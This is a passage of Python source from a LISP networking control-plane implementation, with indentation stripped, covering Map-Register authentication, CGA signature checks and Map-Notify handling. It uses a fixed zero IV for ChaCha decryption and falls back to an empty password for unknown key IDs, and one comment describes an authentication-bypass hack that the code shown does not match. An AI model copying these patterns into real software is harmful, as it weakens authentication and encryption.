for i in range(0, old_div(hash_mask_len, 16)):
addr = address & 0xffff
addr = hex(addr)[2::]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2::]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if ("public-key" not in json_pubkey): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif ("signature-eid" in sig):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data.encode(), hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
#
# Use 20 rounds so we can interoperate with ct-lisp mobile platforms.
#
plaintext = chacha.ChaCha(ekey, iv, 20).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = map_register.xtr_id
if (key in site_eid.individual_registrations):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (addr_str not in site.allowed_rlocs):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
peid_record = copy.deepcopy(eid_record)
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, peid_record, start_rloc_records,
site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_unicast_map_notify
#
# Have ITR process a Map-Notify as a result of sending a subscribe-request.
# Update map-cache entry with new RLOC-set.
#
def lisp_process_unicast_map_notify(lisp_sockets, packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# If no map-cache entry exists or does not have action LISP_SEND_
# PUBSUB_ACTION, ignore.
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.eid)
if (mc == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify EID {}, no subscribe-request entry". \
format(e))
continue
#endif
#
# Check if map-cache entry is configured subscribe-request entry.
# Otherwise, it is an entry created from the subscribe-request entry
# from a returned Map-Notify.
#
if (mc.action != LISP_SEND_PUBSUB_ACTION):
if (mc.subscribed_eid == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify for non-subscribed EID {}". \
format(e))
continue
#endif
#endif
#
# Check if this is the map-cache entry for the EID or the SEND_PUBSUB
# configured map-cache entry. Reuse the memory if the EID entry exists
# and empty RLOC-set since we will rebuild it.
#
old_rloc_set = []
if (mc.action == LISP_SEND_PUBSUB_ACTION):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
subscribed_eid = copy.deepcopy(eid_record.eid)
subscribed_group = copy.deepcopy(eid_record.group)
else:
subscribed_eid = mc.subscribed_eid
subscribed_group = mc.subscribed_group
old_rloc_set = mc.rloc_set
mc.delete_rlocs_from_rloc_probe_list()
mc.rloc_set = []
#endif
#
# Store some data from the EID-record of the Map-Notify.
#
mc.mapping_source = None if source == "lisp-itr" else source
mc.map_cache_ttl = eid_record.store_ttl()
mc.subscribed_eid = subscribed_eid
mc.subscribed_group = subscribed_group
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(old_rloc_set) != 0 and eid_record.rloc_count == 0):
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(eid_str, False)))
continue
#endif
#
# Now add all RLOCs to a new RLOC-set. If the RLOC existed in old set,
# copy old RLOC data. We want to retain, uptimes, stats, and RLOC-
# probe data in the new entry with the same RLOC address.
#
new = replaced = 0
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
#
# See if this RLOC address is in old RLOC-set, if so, do copy.
#
found = False
for r in old_rloc_set:
if (r.rloc.is_exact_match(rloc_record.rloc)):
found = True
break
#endif
#endfor
if (found):
rloc = copy.deepcopy(r)
replaced += 1
else:
rloc = lisp_rloc()
new += 1
#endif
#
# Move data from RLOC-record of Map-Notify to RLOC entry.
#
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
mc.rloc_set.append(rloc)
#endfor
lprint("Update {} map-cache entry with {}/{} new/replaced RLOCs".\
format(green(eid_str, False), new, replaced))
#
# Build best RLOC-set and write to external data-plane, if any.
#
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
#endfor
#
# Find map-server data structure from source address of Map-Notify then
# send Map-Notify-Ack to it.
#
ms = lisp_get_map_server(source)
if (ms == None):
lprint("Cannot find Map-Server for Map-Notify source address {}".\
format(source.print_address_no_iid()))
return
#endif
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is regitered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
